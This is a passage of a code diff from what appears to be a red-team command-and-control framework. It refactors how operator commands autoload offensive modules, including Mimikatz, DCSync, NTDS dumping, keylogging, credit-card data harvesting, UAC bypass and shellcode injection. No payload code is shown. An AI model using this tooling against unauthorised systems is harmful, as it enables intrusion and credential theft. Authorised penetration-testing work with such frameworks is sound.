check_module_loaded("Brute-AD.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("brute-locadmin"): - check_module_loaded("Brute-LocAdmin.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Brute-LocAdmin.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("bypass-uac"): - check_module_loaded("Bypass-UAC.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Bypass-UAC.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("cred-popper"): - check_module_loaded("Cred-Popper.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Cred-Popper.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("cve-2016-9192"): - check_module_loaded("CVE-2016-9192.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("CVE-2016-9192.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("convertto-shellcode"): - check_module_loaded("ConvertTo-Shellcode.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("ConvertTo-Shellcode.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("decrypt-rdcman"): - check_module_loaded("Decrypt-RDCMan.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Decrypt-RDCMan.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("dump-ntds"): - check_module_loaded("Dump-NTDS.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Dump-NTDS.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-computerinfo"): - check_module_loaded("Get-ComputerInfo.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + 
check_module_loaded("Get-ComputerInfo.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-creditcarddata"): - check_module_loaded("Get-CreditCardData.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-CreditCardData.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-gppautologon"): - check_module_loaded("Get-GPPAutologon.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-GPPAutologon.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-gpppassword"): - check_module_loaded("Get-GPPPassword.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-GPPPassword.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-idletime"): - check_module_loaded("Get-IdleTime.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-IdleTime.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-ipconfig"): - check_module_loaded("Get-IPConfig.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-IPConfig.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-keystrokes"): - check_module_loaded("Get-Keystrokes.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-Keystrokes.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-hash"): - check_module_loaded("Get-Hash.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-Hash.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-locadm"): - check_module_loaded("Get-LocAdm.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + 
check_module_loaded("Get-LocAdm.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-mshotfixes"): - check_module_loaded("Get-MSHotFixes.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-MSHotFixes.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netstat"): - check_module_loaded("Get-Netstat.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-Netstat.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-passnotexp"): - check_module_loaded("Get-PassNotExp.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-PassNotExp.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-passpol"): - check_module_loaded("Get-PassPol.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-PassPol.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-recentfiles"): - check_module_loaded("Get-RecentFiles.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-RecentFiles.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-serviceperms"): - check_module_loaded("Get-ServicePerms.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-ServicePerms.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-userinfo"): - check_module_loaded("Get-UserInfo.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-UserInfo.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-wlanpass"): - check_module_loaded("Get-WLANPass.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + 
check_module_loaded("Get-WLANPass.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-pbind"): - check_module_loaded("Invoke-Pbind.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Pbind.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-domaingroupmember"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-kerberoast"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("resolve-ipaddress"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-userhunter"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netlocalgroupmember"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-daisychain"): - check_module_loaded("invoke-daisychain.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("invoke-daisychain.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-hostenum"): - check_module_loaded("HostEnum.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("HostEnum.ps1", 
randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("inject-shellcode"): - check_module_loaded("Inject-Shellcode.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Inject-Shellcode.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("inveigh-relay"): - check_module_loaded("Inveigh-Relay.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Inveigh-Relay.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("inveigh"): - check_module_loaded("Inveigh.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Inveigh.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-inveigh"): - check_module_loaded("Inveigh.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Inveigh.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-arpscan"): - check_module_loaded("Invoke-Arpscan.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Arpscan.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("arpscan"): - check_module_loaded("Invoke-Arpscan.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Arpscan.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-dcsync"): - check_module_loaded("Invoke-DCSync.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-DCSync.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-eventvwrbypass"): - check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri, user, 
loadmodule_command=loadmodule_command) elif command.startswith("invoke-hostscan"): - check_module_loaded("Invoke-Hostscan.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Hostscan.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-ms16-032-proxy"): - check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-ms16-032"): - check_module_loaded("Invoke-MS16-032.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-MS16-032.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-mimikatz"): - check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-psinject"): - check_module_loaded("Invoke-PSInject.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-PSInject.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-pipekat"): - check_module_loaded("Invoke-Pipekat.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Pipekat.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-portscan"): - check_module_loaded("Invoke-Portscan.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Portscan.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-powerdump"): - check_module_loaded("Invoke-PowerDump.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + 
check_module_loaded("Invoke-PowerDump.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-psexec"): - check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-reflectivepeinjection"): - check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-reversednslookup"): - check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-runas"): - check_module_loaded("Invoke-RunAs.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-RunAs.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("runas-netonly"): - check_module_loaded("RunAs-NetOnly.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("RunAs-NetOnly.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-smblogin"): - check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-smbclient"): - check_module_loaded("Invoke-SMBClient.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SMBClient.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-smbexec"): - check_module_loaded("Invoke-SMBExec.ps1", randomuri, 
user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-psexec"): - check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-shellcode"): - check_module_loaded("Invoke-Shellcode.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Shellcode.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-sniffer"): - check_module_loaded("Invoke-Sniffer.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Sniffer.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-sqlquery"): - check_module_loaded("Invoke-SqlQuery.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SqlQuery.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-tater"): - check_module_loaded("Invoke-Tater.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Tater.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-thehash"): - check_module_loaded("Invoke-TheHash.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-TheHash.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-tokenmanipulation"): - check_module_loaded("Invoke-TokenManipulation.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-TokenManipulation.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-wmichecker"): - 
check_module_loaded("Invoke-WMIChecker.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WMIChecker.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-wmicommand"): - check_module_loaded("Invoke-WMICommand.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WMICommand.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-wscriptbypassuac"): - check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-winrmsession"): - check_module_loaded("Invoke-WinRMSession.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WinRMSession.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("out-minidump"): - check_module_loaded("Out-Minidump.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Out-Minidump.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("portscan"): - check_module_loaded("PortScanner.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("PortScanner.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("powercat"): - check_module_loaded("powercat.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powercat.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-allchecks"): - check_module_loaded("PowerUp.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("PowerUp.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("set-lhstokenprivilege"): - 
check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("sharpsocks"): - check_module_loaded("SharpSocks.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("SharpSocks.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("find-allvulns"): - check_module_loaded("Sherlock.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Sherlock.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("test-adcredential"): - check_module_loaded("Test-ADCredential.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Test-ADCredential.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("new-zipfile"): - check_module_loaded("Zippy.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Zippy.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netuser"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-aclscanner"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-dfsshare"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-objectacl"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, 
isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("add-objectacl"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netuser"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-domainuser"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netcomputer"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-domaincomputer"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netuser"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netgroup"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netgroupmember"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, 
loadmodule_command=loadmodule_command) elif command.startswith("get-netshare"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-sharefinder"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netdomain"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netdomaincontroller"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netforest"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("find-domainshare"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netforestdomain"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-mapdomaintrust"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif 
command.startswith("get-wmireglastloggedon"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-wmiregcachedrdpconnection"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-wmiregmounteddrive"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-wmievent"): - check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("remove-wmievent"): - check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-wmi"): - check_module_loaded("Invoke-WMIExec.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WMIExec.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-lapspasswords"): - check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("new-jscriptshell"): - check_module_loaded("New-JScriptShell.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("New-JScriptShell.ps1", randomuri, user, loadmodule_command=loadmodule_command) 
elif command.startswith("invoke-edrchecker"): - check_module_loaded("Invoke-EDRChecker.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-EDRChecker.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-urlcheck"): - check_module_loaded("Invoke-URLCheck.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-URLCheck.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-injectedthread"): - check_module_loaded("Get-InjectedThread.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-InjectedThread.ps1", randomuri, user, loadmodule_command=loadmodule_command) -def run_autoloads_sharp(command, randomuri, user, isPBind=False, isPBindPivot=False, pbind_randomuri=None): +def run_autoloads_sharp(command, randomuri, user, loadmodule_command="loadmodule"): command = command.lower().strip() if command.startswith("run-exe seatbelt"): - check_module_loaded("Seatbelt.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("Seatbelt.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe smbexec.program"): - check_module_loaded("SExec.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SExec.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpup"): - check_module_loaded("SharpUp.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpUp.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe safetydump"): - check_module_loaded("SafetyDump.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + 
check_module_loaded("SafetyDump.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe rubeus"): - check_module_loaded("Rubeus.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("Rubeus.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe standin"): - check_module_loaded("StandIn.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("StandIn.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpview"): - check_module_loaded("SharpView.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpView.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe watson"): - check_module_loaded("Watson.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("Watson.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharphound"): - check_module_loaded("SharpHound.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpHound.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe internalmonologue"): - check_module_loaded("InternalMonologue.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("InternalMonologue.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpsocks"): - check_module_loaded("SharpSocks.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpSocks.exe", randomuri, user, 
loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpweb"): - check_module_loaded("SharpWeb.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpWeb.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpwmi"): - check_module_loaded("SharpWMI.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpWMI.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe wmiexec.program"): - check_module_loaded("WExec.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("WExec.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe smbexec.program"): - check_module_loaded("SExec.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SExec.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe invoke_dcom.program"): - check_module_loaded("DCOM.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("DCOM.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpsc.program"): - check_module_loaded("SharpSC.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpSC.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-screenshotallwindows"): - check_module_loaded("Screenshot.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("Screenshot.dll", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe 
